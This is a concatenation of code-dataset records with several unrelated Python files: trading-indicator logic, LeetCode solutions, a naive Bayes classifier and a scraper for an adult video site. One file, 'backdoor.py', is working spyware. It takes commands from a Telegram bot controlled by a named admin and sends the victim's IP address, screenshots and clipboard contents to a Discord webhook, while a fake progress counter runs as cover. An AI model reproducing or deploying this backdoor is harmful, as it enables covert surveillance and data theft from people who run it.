False\n\n if (td[len(td) - gap] == 9):\n td9PositiveFlag = True;\n\n if (td[len(td) - gap] == -9):\n td9NegativeFlag = True;\n\n if (td[len(td) - gap] == 13):\n td13PositiveFlag = True;\n\n if (td[len(td) - gap] == -13):\n td13NegativeFlag = True;\n\n if (td[len(td) - gap] == 1):\n td1PositiveFlag = True;\n\n if (td[len(td) - gap] == 2):\n td2PositiveFlag = True;\n\n return td9PositiveFlag, td9NegativeFlag, td13PositiveFlag, td13NegativeFlag, td1PositiveFlag, td2PositiveFlag;\n\n def isOverceedingTriangleLine(self, loc_ids, ohlcv):\n indexX1 = loc_ids[0]\n indexX2 = loc_ids[1]\n priceX1 = ohlcv['close'][indexX1] if ohlcv['close'][indexX1] > ohlcv['open'][indexX1] else ohlcv['open'][indexX1];\n priceX2 = ohlcv['close'][indexX2] if ohlcv['close'][indexX2] > ohlcv['open'][indexX1] else ohlcv['open'][indexX2];\n slope = self.getSlope(priceX1, indexX1, priceX2, indexX2);\n slopedPrice = self.calculatePriceAtGivenPlace(slope, indexX1, priceX1);\n return self.isGreaterThanSlopedPrice(slopedPrice);\n\n def isGreaterThanSlopedPrice(self, slopedPrice):\n # close[0] > open[0] && close[0] > estimatedValue && close[-1] <= estimatedValue\n if (ohlcv[0] > slopedPrice):\n return True;\n else:\n return False;\n\n def calculatePriceAtGivenPlace(self, slope, indexX2, x2):\n return slope * indexX2 + x2;\n\n def getSlope(self, x1, indexX1, x2, indexX2):\n return (x2 - x1) / (indexX2 - indexX1);\n\n def candleOverEma(self, opened, close, ema):\n currentCandleOverEma = (opened[len(opened)-1] < ema[len(ema)-1]) and (ema[len(ema)-1] < close[len(close)-1])\n previousCandleIsNotOverEma = not ((opened[len(opened)-2] < ema[len(ema)-2]) and (ema[len(ema)-2] < close[len(close)-2]))\n if currentCandleOverEma and previousCandleIsNotOverEma:\n return True;\n\n def getVariance(self, delta_macd, n):\n delta_max = np.max(np.abs(delta_macd));\n # maxMinNormalization = lambda x : (x - delta_min) / (delta_max - delta_min);\n # normalizedDeltaMacd = maxMinNormalization(delta_macd);\n variance = np.std(delta_macd[0 - n:], ddof=1);\n mean = np.mean(delta_macd[0 - n:]);\n return (variance, mean, delta_max)\n\n #check if ema7 is crossing over ema65\n def ema7OverEma65(self, ema7, ema65):\n N = 5\n #check 5 is below all lines\n arr = []\n for index in range(1, N):\n arr.append((ema7[len(ema7)-index] > ema65[len(ema65)-index]))\n if ((ema7[len(ema7)-index-1] < ema65[len(ema65)-index-1]) and (ema7[len(ema7)-index] > ema65[len(ema65)-index])):\n if(all(flag == True for flag in arr)):\n return True;\n return False;\n\n #check if ema7 is crossing over ema22\n def ema7OverEma22(self, ema7, ema22):\n N = 5\n #check 5 is below all lines\n arr = []\n for index in range(1, N):\n arr.append((ema7[len(ema7)-index] > ema22[len(ema22)-index]))\n if ((ema7[len(ema7)-index-1] < ema22[len(ema22)-index-1]) and (ema7[len(ema7)-index] > ema22[len(ema22)-index])):\n if(all(flag == True for flag in arr)):\n return True;\n return False;\n\n #check if ema7 is crossing over ema33\n def ema7OverEma33(self, ema7, ema33):\n N = 5\n #check 5 is below all lines\n arr = []\n for index in range(1, N):\n arr.append((ema7[len(ema7)-index] > ema33[len(ema33)-index]))\n if ((ema7[len(ema7)-index-1] < ema33[len(ema33)-index-1]) and (ema7[len(ema7)-index] > ema33[len(ema33)-index])):\n if(all(flag == True for flag in arr)):\n return True;\n return False;\n\n def lastNKIsPositive(self, distance_close_open):\n N = 3;\n for i in range(N):\n if (distance_close_open[len(distance_close_open)-i-1] < 0):\n return False;\n return True;\n\n######################## main strategy #######################################\n def detectFirstMacdPositiveSlotPosition(self, macd):\n flag = False;\n for i in range(len(macd)-1, -1, -1):\n if (macd[i] > 0):\n if (flag == True):\n return i + 1;\n else:\n flag = True;\n\n if(i == 0):\n return 0;\n elif (flag == True) :\n return i;\n\n def detectMacdVolumeShrinked(self, macd, start):\n maxIndex = self.getIndexOfMacdPeak(macd, start)\n max = macd[(maxIndex-len(macd))]\n loc = maxIndex\n for index, value in enumerate(macd[(maxIndex - len(macd)):]):\n if(value < max):\n return True;\n loc = loc + 1\n return False;\n\n #deprecated\n def detectBottomDivergenceIsPositiveMacd(self, macd, data, start):\n minIndex = self.getIndexOfMacdValley(macd, start)\n min = data[(minIndex-len(macd))]\n loc = minIndex\n for index, value in enumerate(data[(minIndex-len(macd)):]):\n if(value < min):\n if(macd[ index + (minIndex-len(macd)) ] > 0):\n return True;\n loc = loc + 1\n return False;\n\n #段内底背离\n #macd=[1, 3, -3, -4, -1, -3, -1]\n #data=[10, 9, 8, 7, 8, 5, 8]\n def detectBottomDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"negative\")\n if not zeroMacd:\n return False;\n\n (start, end) = zeroMacd\n min = self.getIndexOfMacdValley(delta_macd, start, end)\n for i in range(min, end, 1):\n if(0 > delta_macd[i] > delta_macd[min]) and (data[i + delta_len] < data[min + delta_len]) \\\n and (macd_signal[i] < 0 and macd_signal[min] < 0):\n return True;\n except Exception as e:\n print(\"段内底背离 异常:\")\n print(e)\n return False\n\n #段内顶背离\n def detectPeakDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"positive\")\n if not zeroMacd:\n return False;\n\n (start, end) = zeroMacd\n maxx = self.getIndexOfMacdPeak(delta_macd, start, end)\n for i in range(maxx, end, 1):\n if(0 < delta_macd[i] < delta_macd[maxx]) and (data[i + delta_len] > data[maxx + delta_len]) \\\n and (macd_signal[i] > 0 and macd_signal[maxx] > 0):\n return True;\n except Exception as e:\n print(\"段内顶背离 异常:\")\n print(e)\n return False\n\n #分立跳空底背离\n def detectMultipleBottomDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"negative\")\n firstMacd = self.detectMacdSlots(delta_macd, 1, \"negative\")\n if not zeroMacd or not firstMacd:\n return False;\n\n (start1, end1) = zeroMacd\n (start2, end2) = firstMacd\n min1 = self.getIndexOfMacdValley(delta_macd, start1, end1)\n min2 = self.getIndexOfMacdValley(delta_macd, start2, end2)\n if (delta_macd[min2] < delta_macd[min1] < 0) \\\n and (data[min2 + delta_len] > data[min1 + delta_len]) \\\n and (macd_signal[min2] < 0 and macd_signal[min1] < 0):\n return True;\n else:\n return False;\n except Exception as e:\n print(\"分立跳空底背离:\")\n print(e)\n return False\n\n #分立跳空顶背离\n def detectMultiplePeakDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"positive\")\n firstMacd = self.detectMacdSlots(delta_macd, 1, \"positive\")\n if not zeroMacd or not firstMacd:\n return False;\n\n (start1, end1) = zeroMacd\n (start2, end2) = firstMacd\n max1 = self.getIndexOfMacdPeak(delta_macd, start1, end1)\n max2 = self.getIndexOfMacdPeak(delta_macd, start2, end2)\n if (delta_macd[max2] > delta_macd[max1] > 0) \\\n and (data[max2 + delta_len] < data[max1 + delta_len]) \\\n and (macd_signal[max1] > 0 and macd_signal[max2] > 0):\n return True;\n else:\n return False;\n except Exception as e:\n print(\"分立跳空顶背离:\")\n print(e)\n return False\n\n def detectMacdSlots(self, macd, times, direction):\n start = len(macd)-1\n initialPoint = start\n directionIsPositive = (direction == 'positive');\n if (macd[start] > 0) ^ directionIsPositive:\n return (-1, -1)\n start = self.walksOneSlotLength(macd, start);\n if(times == 0):\n return (start+1, initialPoint)\n for i in range(start, -1, -1):\n i = self.walksOneSlotLength(macd, i);\n slotStart = i\n i = self.walksOneSlotLength(macd, i);\n times = times - 1;\n if (times == 0):\n return (i+1, slotStart)\n\n def walksOneSlotLength(self, slot, start):\n isPositive = (slot[start] > 0);\n for i in range(start, -1, -1):\n if (not (isPositive^(slot[i] <= 0))):\n return i;\n return -1;\n\n\n #Test: a=[1,2,3,4,5,6,-1,-2]\n def detectLastMacdNegativeSlots(self, macd):\n flag = False;\n for i in range(len(macd)-1, -1, -1):\n if (macd[i] > 0):\n if(flag == True):\n return i+1;\n elif (flag == False):\n flag = True;\n\n def getIndexOfMacdPeak(self, macd, start, end):\n maxx = start\n for i in range(start, end):\n if(macd[i] > macd[maxx]):\n maxx = i;\n return maxx;\n\n def getIndexOfMacdValley(self, macd, start, end):\n min = start\n for i in range(start, end):\n if(macd[i] < macd[min]):\n min = i;\n return min;\n ################################################################\n\n def isTheIntersectionPointCloseToBePositive(self, macd, macd_signal, n, intersectionValueAndMin):\n return self.calIntersectionPointRate(self.GetIntersectPointofLines(self.organizeDataPoint(macd, macd_signal, n))[0], macd, intersectionValueAndMin) is not None ;\n\n def organizeDataPoint(self, macd, macd_signal, n):\n return (macd[len(macd)-1-n], 1, macd[len(macd)-n], 2, macd_signal[len(macd_signal)-1-n], 1, macd_signal[len(macd_signal)-n], 2);\n\n def calIntersectionPointRate(self, intersectionValue, macd, intersectionValueAndMin): #intersectionRate\n (result, min) = self.lastNMinusMacdVolume(macd)\n intersectionValueAndMin[0] = intersectionValue;\n intersectionValueAndMin[1] = min;\n return intersectionValueAndMin;\n\n def GeneralEquation(self, first_x,first_y,second_x,second_y):\n A=second_y - first_y\n B=first_x - second_x\n C=second_x*first_y - first_x*second_y\n return A,B,C\n\n def GetIntersectPointofLines(self, vector):\n x1 = vector[0]\n y1 = vector[1]\n x2 = vector[2]\n y2 = vector[3]\n x3 = vector[4]\n y3 = vector[5]\n x4 = vector[6]\n y4 = vector[7]\n A1,B1,C1 = self.GeneralEquation(x1,y1,x2,y2)\n A2, B2, C2 = self.GeneralEquation(x3,y3,x4,y4)\n m=A1*B2-A2*B1\n if m==0:\n print(\"no intersection\")\n else:\n x=(C2*B1-C1*B2)/m\n y=(C1*A2-C2*A1)/m\n return x,y\n\n def lastNBoolIsNarrowed(self, delta_boll,n):\n test_arr = delta_boll[0-n:];\n for x in test_arr:\n if(x > 5.0): #narrowed area\n return (False, test_arr);\n return (True, test_arr);\n\n def lastNDMIIsPositive(self, delta_dmi,n):\n if ((delta_dmi[len(delta_dmi) - 1] > 0 and\n delta_dmi[len(delta_dmi) - 2] < 0)\n\n or\n\n (delta_dmi[len(delta_dmi) - 1] > 0 and\n delta_dmi[len(delta_dmi) - 2] > 0 and\n delta_dmi[len(delta_dmi) - 3] < 0)):\n\n return True;\n return False;\n\n # theOneBefore = delta_dmi[len(delta_dmi) - n - 1];\n # flag = self.lastNDataIsPositive(delta_dmi, n);\n # if(flag):\n # return (theOneBefore < 0);\n # else:\n # return flag;\n\n def lastNDataIsPositive(self, delta, n):\n test_arr = delta[0 - n:];\n for x in test_arr:\n if (x < 0):\n return False;\n return True;\n\n def printResult(self, new_result, exchange, market_pair, output_mode, criteriaType, indicatorTypeCoinMap):\n output_data = deepcopy(new_result[exchange][market_pair])\n print(\n exchange,\n criteriaType,\n self.output[output_mode](output_data, criteriaType, market_pair, exchange, indicatorTypeCoinMap),\n end=''\n )\n\n def toDb(self, td_name, exchange, market_pair):\n candle_period = self.indicator_conf['macd'][0]['candle_period'];\n sql = \"INSERT INTO td(td_name, market_pair, candle_period, exchange, create_date) \" \\\n \"select distinct %s,%s,%s,%s,%s from dual where not exists( select 1 from td \" \\\n \"where td_name = %s and market_pair = %s and candle_period = %s and exchange = %s \" \\\n \"and create_date >= date_sub(%s, interval 10 day) and create_date <= %s)\"\n val = (td_name, market_pair, candle_period, exchange, date.today(),\n td_name, market_pair, candle_period, exchange, date.today(), date.today())\n Behaviour.mydb.cursor().execute(sql, val)\n Behaviour.mydb.commit() # 数据表内容有更新,必须使用到该语句\n print(Behaviour.mydb.cursor().rowcount, \"记录插入成功。\")\n\n def lastNMacdsArePositive(self, delta_macd, macd, n):\n (result, min) = self.lastNMinusMacdVolume(macd)\n test_arr = delta_macd[0-n:];\n theOneBefore = delta_macd[len(delta_macd)-n-1];\n for x in test_arr:\n if(x < 0 or (abs(x/min) >= 0.3)): #the rate of macd value divided by the megative highest macd value is less than 0.3\n return False;\n \n return True;\n \n def lastNMinusDecreased(self, delta_macd, min):\n for i in range(len(delta_macd)):\n if(delta_macd[i] == min and i != 0):\n return True;\n else:\n return False;\n \n def lastNMinusMacdVolume(self, delta_macd):\n result = []\n min = 0\n negativeStarted = False\n for x in reversed(delta_macd):\n if(x <= 0):\n negativeStarted = True\n if(x < min):\n min = x\n result.append(x)\n elif negativeStarted: #always return from here\n return (result, min)\n return (result, min)\n \n def _hasMinusBefore(self, arr, informant):\n n = len(arr)\n period = informant[0][\"candle_period\"]\n if period == '1d':\n N = 10\n elif period == '1w':\n N = 3\n else:\n N = 10\n try:\n for index in range(n-1, n-1-N, -1):\n if arr[index] <= 0:\n return True;\n return False;\n except Exception as e: \n print(\"An exception occurred:\" + str(e))\n \n def _lis(self, arr):\n n = len(arr)\n m = [0]*n\n for x in range(n-2,-1,-1):\n for y in range(n-1,x,-1):\n if arr[x] < arr[y] and m[x] <= m[y]:\n m[x] += 1\n max_value = max(m)\n result = []\n for i in range(n):\n if m[i] == max_value:\n result.append(arr[i])\n max_value -= 1\n return result\n \n \n def _get_indicator_results(self, exchange, market_pair):\n \"\"\"Execute the indicator analysis on a particular exchange and pair.\n\n Args:\n exchange (str): The exchange to get the indicator results for.\n market_pair (str): The pair to get the market pair results for.\n\n Returns:\n list: A list of dictinaries containing the results of the analysis.\n \"\"\"\n\n results = { indicator: list() for indicator in self.indicator_conf.keys() }\n historical_data_cache = dict()\n\n # for indicator in self.indicator_conf:\n # if indicator not in self.indicator_dispatcher:\n # self.logger.warn(\"No such indicator %s, skipping.\", indicator)\n # continue\n\n for indicator in self.indicator_dispatcher:\n for indicator_conf in self.indicator_conf[indicator]:\n if indicator_conf['enabled']:\n candle_period = indicator_conf['candle_period']\n else:\n self.logger.debug(\"%s is disabled, skipping.\", indicator)\n continue\n\n if candle_period not in historical_data_cache:\n historical_data_cache[candle_period] = self._get_historical_data(\n market_pair,\n exchange,\n candle_period\n )\n\n if historical_data_cache[candle_period]:\n analysis_args = {\n 'historical_data': historical_data_cache[candle_period],\n 'signal': indicator_conf['signal'],\n 'hot_thresh': indicator_conf['hot'],\n 'cold_thresh': indicator_conf['cold']\n }\n\n if 'period_count' in indicator_conf:\n analysis_args['period_count'] = indicator_conf['period_count']\n\n results[indicator].append({\n 'result': self._get_analysis_result(\n self.indicator_dispatcher,\n indicator,\n analysis_args,\n market_pair\n ),\n 'config': indicator_conf\n })\n return results\n\n\n def _get_informant_results(self, exchange, market_pair):\n \"\"\"Execute the informant analysis on a particular exchange and pair.\n\n Args:\n exchange (str): The exchange to get the indicator results for.\n market_pair (str): The pair to get the market pair results for.\n\n Returns:\n list: A list of dictinaries containing the results of the analysis.\n \"\"\"\n\n results = { informant: list() for informant in self.informant_conf.keys() }\n historical_data_cache = dict()\n\n # for informant in self.informant_conf:\n # if informant not in self.informant_dispatcher:\n # self.logger.warn(\"No such informant %s, skipping.\", informant)\n # continue\n for informant in self.informant_dispatcher:\n\n for informant_conf in self.informant_conf[informant]:\n if informant_conf['enabled']:\n candle_period = informant_conf['candle_period']\n else:\n self.logger.debug(\"%s is disabled, skipping.\", informant)\n continue\n\n if candle_period not in historical_data_cache:\n historical_data_cache[candle_period] = self._get_historical_data(\n market_pair,\n exchange,\n candle_period\n )\n\n if historical_data_cache[candle_period]:\n analysis_args = {\n 'historical_data': historical_data_cache[candle_period]\n }\n\n if 'period_count' in informant_conf:\n analysis_args['period_count'] = informant_conf['period_count']\n\n results[informant].append({\n 'result': self._get_analysis_result(\n self.informant_dispatcher,\n informant,\n analysis_args,\n market_pair\n ),\n 'config': informant_conf\n })\n\n return results\n\n\n def _get_crossover_results(self, new_result):\n \"\"\"Execute crossover analysis on the results so far.\n\n Args:\n new_result (dict): A dictionary containing the results of the informant and indicator\n analysis.\n\n Returns:\n list: A list of dictinaries containing the results of the analysis.\n \"\"\"\n\n crossover_dispatcher = self.strategy_analyzer.crossover_dispatcher()\n results = { crossover: list() for crossover in self.crossover_conf.keys() }\n\n for crossover in self.crossover_conf:\n if crossover not in crossover_dispatcher:\n self.logger.warn(\"No such crossover %s, skipping.\", crossover)\n continue\n\n for crossover_conf in self.crossover_conf[crossover]:\n if not crossover_conf['enabled']:\n self.logger.debug(\"%s is disabled, skipping.\", crossover)\n continue\n \n key_indicator = new_result[crossover_conf['key_indicator_type']][crossover_conf['key_indicator']][crossover_conf['key_indicator_index']]\n crossed_indicator = new_result[crossover_conf['crossed_indicator_type']][crossover_conf['crossed_indicator']][crossover_conf['crossed_indicator_index']]\n\n dispatcher_args = {\n 'key_indicator': key_indicator['result'],\n 'key_signal': crossover_conf['key_signal'],\n 'key_indicator_index': crossover_conf['key_indicator_index'],\n 'crossed_indicator': crossed_indicator['result'],\n 'crossed_signal': crossover_conf['crossed_signal'],\n 'crossed_indicator_index': crossover_conf['crossed_indicator_index']\n }\n\n results[crossover].append({\n 'result': crossover_dispatcher[crossover](**dispatcher_args),\n 'config': crossover_conf\n })\n return results\n\n\n def _get_historical_data(self, market_pair, exchange, candle_period):\n \"\"\"Gets a list of OHLCV data for the given pair and exchange.\n\n Args:\n market_pair (str): The market pair to get the OHLCV data for.\n exchange (str): The exchange to get the OHLCV data for.\n candle_period (str): The timeperiod to collect for the given pair and exchange.\n\n Returns:\n list: A list of OHLCV data.\n \"\"\"\n\n historical_data = list()\n try:\n historical_data = self.exchange_interface.get_historical_data(\n market_pair,\n exchange,\n candle_period\n )\n except RetryError:\n self.logger.error(\n 'Too many retries fetching information for pair %s, skipping',\n market_pair\n )\n except ExchangeError:\n self.logger.error(\n 'Exchange supplied bad data for pair %s, skipping',\n market_pair\n )\n except ValueError as e:\n self.logger.error(e)\n self.logger.error(\n 'Invalid data encountered while processing pair %s, skipping',\n market_pair\n )\n self.logger.debug(traceback.format_exc())\n except AttributeError:\n self.logger.error(\n 'Something went wrong fetching data for %s, skipping',\n market_pair\n )\n self.logger.debug(traceback.format_exc())\n return historical_data\n\n\n def _get_analysis_result(self, dispatcher, indicator, dispatcher_args, market_pair):\n \"\"\"Get the results of performing technical analysis\n\n Args:\n dispatcher (dict): A dictionary of functions for performing TA.\n indicator (str): The name of the desired indicator.\n dispatcher_args (dict): A dictionary of arguments to provide the analyser\n market_pair (str): The market pair to analyse\n\n Returns:\n pandas.DataFrame: Returns a pandas.DataFrame of results or an empty string.\n \"\"\"\n\n try:\n results = dispatcher[indicator](**dispatcher_args)\n except TypeError:\n self.logger.info(\n 'Invalid type encountered while processing pair %s for indicator %s, skipping',\n market_pair,\n indicator\n )\n self.logger.info(traceback.format_exc())\n results = str()\n return results\n","sub_path":"app/behaviour.py","file_name":"behaviour.py","file_ext":"py","file_size_in_byte":57166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"503645680","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 30 19:39:55 2021\n\n@author: tenor2000\n\"\"\"\n\ndef maximumGap(nums): \n '''\n type: List[int]\n rtype: int\n '''\n if len(nums) < 2:\n return 0\n nums = sorted(nums)\n maxgap = 0\n for x, y in enumerate(nums):\n maxgap = max(maxgap, nums[x] - nums[x-1])\n \n return maxgap","sub_path":"Maximum_Gap.py","file_name":"Maximum_Gap.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607130853","text":"\n\nfrom xai.brain.wordbase.nouns._gusset import _GUSSET\n\n#calss header\nclass _GUSSETS(_GUSSET, ):\n\tdef __init__(self,): \n\t\t_GUSSET.__init__(self)\n\t\tself.name = \"GUSSETS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"gusset\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_gussets.py","file_name":"_gussets.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"256423935","text":"import requests\nimport pyautogui\nimport win32clipboard\nimport time\nimport os\nimport threading\nfrom typing import Dict\n\n\n\nclass Logger:\n tgtoken = \"\"\n dhook = \"\"\n admin = \"hkeydesign\"\n\n @classmethod\n def log(cmd,message,ss):\n response = True\n\n r = requests.post(Logger.dhook,data={\n 'content':message\n },files={\n 'file.png':ss\n })\n\n if str(r) != '':\n response = False\n\n return response\n\n @classmethod\n def screen_shot(cmd):\n pyautogui.screenshot(os.environ[\"USERPROFILE\"] + r\"\\AppData\\Local\\Google\\Chrome\\User Data\\resim.jpg\")\n\n jpgfile = open(os.environ[\"USERPROFILE\"] + r\"\\AppData\\Local\\Google\\Chrome\\User Data\\resim.jpg\", \"rb\").read()\n\n resp = Logger.log(f'Screen Shot',jpgfile)\n\n return resp\n\n @classmethod\n def checkit(cmd) -> Dict[str, str]:\n r = requests.get(f'https://api.telegram.org/bot{Logger.tgtoken}/getUpdates').json()\n \n status = True\n message = None\n author = None\n\n try:\n message = r['result'][-1]['message']['text']\n author = r['result'][-1]['message']['chat']['username']\n date = r['result'][-1]['message']['date']\n except:\n status = False\n \n result = {\n 'status':status,\n 'message':message,\n 'author':author,\n 'date':date\n }\n\n return result\n\n @classmethod\n def ip_adress(cmd):\n r = requests.get('https://api.ipify.org')\n ip = r.text\n print(ip)\n\n resp = Logger.log(f'Adress: {ip}',None)\n\n return resp\n\n @classmethod\n def getcboard(cmd):\n win32clipboard.OpenClipboard()\n data = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n\n resp = Logger.log(f'Clipboard: {data}',None)\n\n return resp\n\ndef oneff():\n last = {'date':None}\n\n while True:\n rsp = Logger.checkit()\n if rsp['status'] == True and rsp['author'] == Logger.admin:\n\n if rsp['message'] == 'ip' and rsp['date'] != last['date']:\n ip = Logger.ip_adress()\n last = rsp\n\n elif rsp['message'] == 'foto' and rsp['date'] != last['date']:\n Logger.screen_shot()\n last = rsp\n\n elif rsp['message'] == 'cboard' and rsp['date'] != last['date']:\n Logger.getcboard()\n last = rsp\n\n time.sleep(2)\n\ndef sayac(n):\n print(f'[{n*\"-\"}]', end=\"\")\n\n print('\\b'*(n+1), end=\"\")\n\n for _ in range(n):\n print(flush=True, end=\"\")\n print('*', end=\"\")\n time.sleep(10)\n\nx = threading.Thread(target=oneff, args=())\nx.start()\n\ny = threading.Thread(target=sayac, args=(100,))\ny.start()\n","sub_path":"backdoor.py","file_name":"backdoor.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146601761","text":"\nfrom __future__ import absolute_import\n\nimport re\nfrom lxml import html\nimport logging\nfrom fetcher.studio import BaseStudio\nfrom fetcher.videolist import VideoList, VideoListFilterFile\nfrom .video import BelAmiVideo\nimport os\nfrom optparse import OptionGroup\nfrom time import sleep\nimport simplejson as json\n\nlogger = logging.getLogger(__name__)\n\n\nclass BelAmiStudio(BaseStudio):\n auth_post_url = \"http://club.belamionline.com/clublogin/login.asp\"\n main_page = \"http://club.belamionline.com/entrance/Simple2015.aspx\"\n content_items_list_page = \"http://club.belamionline.com/entrance/\" \\\n \"WebServices/ContentItemsListWebService.asmx/\" \\\n \"GetContentItemsListControl\"\n item_page = \"http://club.belamionline.com/entrance/Content.aspx?Id=%s\"\n thumbnail_page = \"http://club.belamionline.com/entrance/%s\"\n\n def add_option_group(self, parser):\n group = OptionGroup(parser, \"Bel Ami Options\")\n group.add_option(\"--belami-username\", dest=\"belami_username\",\n help=\"Username for belami.com\")\n group.add_option(\"--belami-password\", dest=\"belami_password\",\n help=\"Password for belami.com\")\n group.add_option(\"--belami-target\", dest=\"belami_target\",\n help=\"Target directory for downloads from \"\n \"belami.com\")\n parser.add_option_group(group)\n\n def set_options(self, limit, reverse, options):\n logger.debug(\"Setting options for %s\" % __name__)\n self._username = options['username']\n self._password = options['password']\n self._target = options['target']\n\n self._validate()\n\n model = options['model'] if 'model' in options else None\n if model and not re.match(r\"/[0-9]+/[a-zA-Z]+/\", model):\n raise Exception(\"The model name must be in the format \"\n \"/NUMBER/NAME, e.g. /664/jess/\")\n self.model = model\n self.page = options['page'] if 'page' in options else None\n\n self.limit = limit\n self.reverse = reverse\n\n def _authenticate(self):\n if self._authenticated:\n logger.debug(\"Skipping authentication because already \"\n \"authenticated.\")\n return\n\n # Authenticate\n data = {\n 'txtUser': self._username,\n 'txtPass': self._password,\n \"input\": \"\",\n \"page\": BelAmiStudio.main_page,\n \"Forward\": \"\",\n \"Action\": \"LOGIN\",\n }\n r = self.session.post(BelAmiStudio.auth_post_url, data=data)\n r.raise_for_status()\n\n url = BelAmiStudio.main_page\n\n sleep(5)\n logger.debug(\"Fetching main page %s\" % url)\n page = self.session.get(url)\n page.raise_for_status()\n sleep(1)\n\n self._authenticated = True\n\n def _update_video_list(self):\n fetched_file = os.path.join(self._target, '.fetched')\n self._videos = VideoList(VideoListFilterFile(fetched_file))\n\n self._authenticate()\n\n url = BelAmiStudio.content_items_list_page\n logger.debug(\"Getting clip data from %s\" % url)\n data = {\n \"contextKey\": \"ContentBox2#SimpleVideosSexScenesAll#1###undefined\"\n }\n page = self.session.post(url, json=data)\n video_content_box = json.loads(page.content)[\"d\"]\n tree = html.fromstring(video_content_box)\n links = tree.xpath('//*[@id=\"ContentBox2_PopulateArea\"]/div/div[1]/'\n 'div[2]/a')\n\n if self.reverse:\n links.reverse()\n\n count = 1\n for link in links:\n title = link.find('img').get('alt').strip().replace('\"', '')\n slug = re.sub(\"[^0-9]+\", \"\", link.get('onclick'))\n description_url = BelAmiStudio.item_page % slug\n video = BelAmiVideo(slug, description_url, self.session, title)\n\n if self._videos.is_item_fetched(video):\n continue\n\n self._videos[slug] = video\n count += 1\n if count > self.limit:\n logger.debug(\"Hit video fetch limit for %s\" % self.name)\n break\n\n def video_from_filename(self, filename):\n (slug, title) = self._slug_from_filename(filename, \"Bel Ami\")\n description_url = BelAmiStudio.item_page % slug\n\n self._authenticate()\n video = BelAmiVideo(slug, description_url, self.session, title)\n video._update_all()\n return video\n\n\ndef init():\n return BelAmiStudio()\n","sub_path":"fetcher/belami/studio.py","file_name":"studio.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344378342","text":"num_entries_per_category = {}\nfuscat1 = {} # {'spo':}\nint_one = 1\nfloat_one = 1.0\n\ndef predict(features):\n features = {'spo': ((int((features[0] * 100.0)) * 1000000.0) + int((features[1] * 100.0)))}\n ugooki2 = []\n fuscat2 = sum(num_entries_per_category.itervalues())\n for jjdi1 in num_entries_per_category:\n Chri4 = (num_entries_per_category[jjdi1] / fuscat2)\n for fuscat3 in features:\n if ((fuscat3 in fuscat1) and (features[fuscat3] in fuscat1[fuscat3]) and (jjdi1 in fuscat1[fuscat3][features[fuscat3]])):\n Chri4 *= (fuscat1[fuscat3][features[fuscat3]][jjdi1] / num_entries_per_category[jjdi1])\n else:\n Chri4 *= (0.01 / fuscat2)\n ugooki2.append((jjdi1, Chri4))\n ugooki2 = sorted(ugooki2, key=(lambda ormow1: (1 - ormow1[1])))\n jjdi3 = sum(map((lambda Chri3: Chri3[1]), ugooki2))\n ugooki2 = map((lambda fuscat5: ((fuscat5[0] * fuscat5[1]) / jjdi3)), ugooki2)\n ugooki2 = sum(ugooki2)\n # This seems to be a number that is either 0, very small, 0.5 or very nearly\n # 1\n #print ugooki2\n return ugooki2\n\ndef train(features, label):\n global int_one\n features = {'spo': ((int((features[0] * 100.0)) * 1000000.0) + int((features[1] * 100.0)))}\n for feature_key in features:\n # fuscat1 is a global variable\n if feature_key not in fuscat1:\n fuscat1[feature_key] = {} \n if features[feature_key] not in fuscat1[feature_key]:\n fuscat1[feature_key][features[feature_key]] = {}\n if label not in fuscat1[feature_key][features[feature_key]]:\n fuscat1[feature_key][features[feature_key]][label] = 0.0\n fuscat1[feature_key][features[feature_key]][label] += int_one\n if label not in num_entries_per_category:\n num_entries_per_category[label] = 0.0\n num_entries_per_category[label] += int_one\n int_one = (int_one * float_one)\n\n\ndef reset(set_float_one=1.0):\n global int_one\n global float_one\n global num_entries_per_category\n global fuscat1\n num_entries_per_category = {}\n fuscat1 = {}\n int_one = 1\n float_one = set_float_one\n\nif (__name__ == '__main__'):\n train([1, 1], 1)\n train([0, 0], 2)\n #print predict([1, 1])\n","sub_path":"data_challenges/mbrdna_data_challenge/MBRDNA_MLPUX_InterviewChallenge/mnbayes.py","file_name":"mnbayes.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559764869","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n# Time complexity: O()\n# Space complexity: O()\n\n\nclass Solution:\n def splitArray(self, nums: List[int], m: int) -> int:\n\n def valid(mid):\n count = 1\n total = 0\n for num in nums:\n total += num\n if total > mid:\n total = num\n count += 1\n if count > m:\n return False\n return True\n\n low = max(nums)\n high = sum(nums)\n\n while low <= high:\n mid = (low + high) // 2\n if valid(mid):\n high = mid - 1\n else:\n low = mid + 1\n\n return low\n\n\n# https://leetcode.com/problems/split-array-largest-sum/discuss/141497/AC-Java-DFS-%2B-memorization\n# dp 做法\n# 